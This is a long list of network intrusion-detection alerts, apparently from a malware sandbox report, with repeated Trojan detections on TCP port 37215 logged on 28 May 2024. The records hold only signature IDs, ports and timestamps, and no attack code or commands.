          SID:2835222
          Source Port:46944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530374
          SID:2829579
          Source Port:46262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267828
          SID:2829579
          Source Port:56794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741772
          SID:2829579
          Source Port:59076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271581
          SID:2829579
          Source Port:45596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322224
          SID:2829579
          Source Port:46730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299236
          SID:2829579
          Source Port:43308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273265
          SID:2835222
          Source Port:53046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735772
          SID:2829579
          Source Port:57354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287457
          SID:2829579
          Source Port:38684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145651
          SID:2835222
          Source Port:34292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743540
          SID:2829579
          Source Port:45844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793263
          SID:2835222
          Source Port:47998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741626
          SID:2829579
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727171
          SID:2835222
          Source Port:54558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497879
          SID:2829579
          Source Port:41816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225392
          SID:2835222
          Source Port:50640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399503
          SID:2829579
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102762
          SID:2835222
          Source Port:36990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593119
          SID:2835222
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.554714
          SID:2829579
          Source Port:44510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819398
          SID:2829579
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.615232
          SID:2829579
          Source Port:53244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542377
          SID:2835222
          Source Port:50146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208945
          SID:2829579
          Source Port:33668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276207
          SID:2829579
          Source Port:49238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804520
          SID:2829579
          Source Port:60012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339632
          SID:2829579
          Source Port:46300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175524
          SID:2835222
          Source Port:50048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.247623
          SID:2835222
          Source Port:60576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.217686
          SID:2835222
          Source Port:40964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846996
          SID:2835222
          Source Port:34276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267726
          SID:2829579
          Source Port:52862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497413
          SID:2835222
          Source Port:57898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302989
          SID:2829579
          Source Port:49448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.248248
          SID:2829579
          Source Port:34484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170547
          SID:2835222
          Source Port:54562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959017
          SID:2829579
          Source Port:45082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846402
          SID:2829579
          Source Port:46836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245570
          SID:2835222
          Source Port:42856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943150
          SID:2829579
          Source Port:51432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.888132
          SID:2829579
          Source Port:49650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209408
          SID:2835222
          Source Port:52026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207959
          SID:2829579
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.238165
          SID:2829579
          Source Port:41150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609479
          SID:2829579
          Source Port:60788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.035473
          SID:2835222
          Source Port:41194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770160
          SID:2835222
          Source Port:54132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561779
          SID:2829579
          Source Port:40426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401283
          SID:2835222
          Source Port:45334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371424
          SID:2835222
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466203
          SID:2835222
          Source Port:42928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065412
          SID:2829579
          Source Port:43446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922735
          SID:2835222
          Source Port:55458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196202
          SID:2829579
          Source Port:44802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272728
          SID:2835222
          Source Port:51502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267407
          SID:2829579
          Source Port:45090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216018
          SID:2835222
          Source Port:56800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709099
          SID:2835222
          Source Port:57560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266605
          SID:2829579
          Source Port:34578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239584
          SID:2829579
          Source Port:37730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907616
          SID:2835222
          Source Port:52126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846289
          SID:2835222
          Source Port:36354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.364855
          SID:2835222
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401051
          SID:2835222
          Source Port:39104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849442
          SID:2835222
          Source Port:43196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248080
          SID:2829579
          Source Port:44498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664673
          SID:2829579
          Source Port:37652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116686
          SID:2829579
          Source Port:51106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487367
          SID:2835222
          Source Port:42618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324081
          SID:2829579
          Source Port:39316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496739
          SID:2835222
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196304
          SID:2829579
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222871
          SID:2835222
          Source Port:35254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630034
          SID:2835222
          Source Port:35520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590503
          SID:2829579
          Source Port:40028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230273
          SID:2835222
          Source Port:38216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949276
          SID:2829579
          Source Port:55648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144092
          SID:2829579
          Source Port:33084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559854
          SID:2835222
          Source Port:58890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114380
          SID:2835222
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325347
          SID:2835222
          Source Port:53240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657042
          SID:2829579
          Source Port:57372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657096
          SID:2835222
          Source Port:40666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989717
          SID:2829579
          Source Port:41794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636562
          SID:2835222
          Source Port:46502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806655
          SID:2835222
          Source Port:50116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176339
          SID:2835222
          Source Port:39552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764330
          SID:2835222
          Source Port:55540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464244
          SID:2835222
          Source Port:54826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.237499
          SID:2835222
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116844
          SID:2835222
          Source Port:38416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667012
          SID:2829579
          Source Port:45718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665495
          SID:2835222
          Source Port:48620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211610
          SID:2835222
          Source Port:47188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859061
          SID:2829579
          Source Port:49748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210551
          SID:2829579
          Source Port:58950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891691
          SID:2835222
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326098
          SID:2835222
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592105
          SID:2829579
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821885
          SID:2829579
          Source Port:54492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.948619
          SID:2829579
          Source Port:41690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839687
          SID:2835222
          Source Port:33606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.284883
          SID:2835222
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400858
          SID:2835222
          Source Port:48332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156220
          SID:2829579
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288312
          SID:2829579
          Source Port:57146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269147
          SID:2829579
          Source Port:59528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081372
          SID:2829579
          Source Port:50504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476796
          SID:2835222
          Source Port:43820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431372
          SID:2829579
          Source Port:56694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221174
          SID:2829579
          Source Port:45060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327981
          SID:2835222
          Source Port:39984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497771
          SID:2829579
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325934
          SID:2835222
          Source Port:50222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729072
          SID:2829579
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223132
          SID:2829579
          Source Port:38654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204817
          SID:2835222
          Source Port:46364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350386
          SID:2835222
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301149
          SID:2829579
          Source Port:45040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935162
          SID:2835222
          Source Port:35308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527080
          SID:2829579
          Source Port:46746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430153
          SID:2835222
          Source Port:34854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922401
          SID:2829579
          Source Port:54954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107415
          SID:2829579
          Source Port:50258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341318
          SID:2835222
          Source Port:34502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885883
          SID:2835222
          Source Port:53130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.277676
          SID:2829579
          Source Port:51246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864688
          SID:2835222
          Source Port:56404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142643
          SID:2829579
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112845
          SID:2835222
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.066181
          SID:2835222
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.566325
          SID:2829579
          Source Port:40698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651520
          SID:2829579
          Source Port:38008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270656
          SID:2829579
          Source Port:40122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739247
          SID:2829579
          Source Port:46072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622183
          SID:2835222
          Source Port:35550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848415
          SID:2829579
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663099
          SID:2829579
          Source Port:42316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986087
          SID:2829579
          Source Port:44096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841240
          SID:2829579
          Source Port:52352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373239
          SID:2835222
          Source Port:36798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473745
          SID:2835222
          Source Port:44068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923640
          SID:2829579
          Source Port:51954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462565
          SID:2835222
          Source Port:42286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819746
          SID:2835222
          Source Port:49256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842137
          SID:2835222
          Source Port:53746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513715
          SID:2829579
          Source Port:37412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678463
          SID:2835222
          Source Port:39280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273312
          SID:2835222
          Source Port:35394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323954
          SID:2835222
          Source Port:44708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551567
          SID:2829579
          Source Port:58722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628418
          SID:2835222
          Source Port:43134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177174
          SID:2835222
          Source Port:35668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664655
          SID:2829579
          Source Port:46572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300994
          SID:2835222
          Source Port:43262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609582
          SID:2835222
          Source Port:58828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949574
          SID:2835222
          Source Port:43502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202952
          SID:2829579
          Source Port:46354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180257
          SID:2829579
          Source Port:46006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033391
          SID:2835222
          Source Port:57602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400712
          SID:2835222
          Source Port:48460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923028
          SID:2835222
          Source Port:44266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977921
          SID:2835222
          Source Port:32962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277979
          SID:2835222
          Source Port:48962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197309
          SID:2829579
          Source Port:51672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877686
          SID:2829579
          Source Port:56498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025828
          SID:2829579
          Source Port:50034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498036
          SID:2829579
          Source Port:40470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415853
          SID:2829579
          Source Port:40762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594495
          SID:2829579
          Source Port:57838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.050882
          SID:2835222
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803181
          SID:2835222
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196595
          SID:2835222
          Source Port:53468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201269
          SID:2835222
          Source Port:41260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549464
          SID:2835222
          Source Port:48754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061855
          SID:2835222
          Source Port:52048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.376103
          SID:2835222
          Source Port:41972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210551
          SID:2829579
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476812
          SID:2829579
          Source Port:48776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889391
          SID:2835222
          Source Port:37614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268590
          SID:2835222
          Source Port:51268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863861
          SID:2829579
          Source Port:55468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178495
          SID:2829579
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547552
          SID:2835222
          Source Port:37286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266245
          SID:2829579
          Source Port:46600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105439
          SID:2835222
          Source Port:52208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201295
          SID:2829579
          Source Port:55866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.319130
          SID:2835222
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326828
          SID:2829579
          Source Port:54968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223189
          SID:2835222
          Source Port:50408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535400
          SID:2835222
          Source Port:39216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797511
          SID:2835222
          Source Port:46960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229019
          SID:2835222
          Source Port:33670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178472
          SID:2829579
          Source Port:40342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156221
          SID:2829579
          Source Port:47110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609503
          SID:2829579
          Source Port:59304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660385
          SID:2829579
          Source Port:49182
          Destination Port:37215
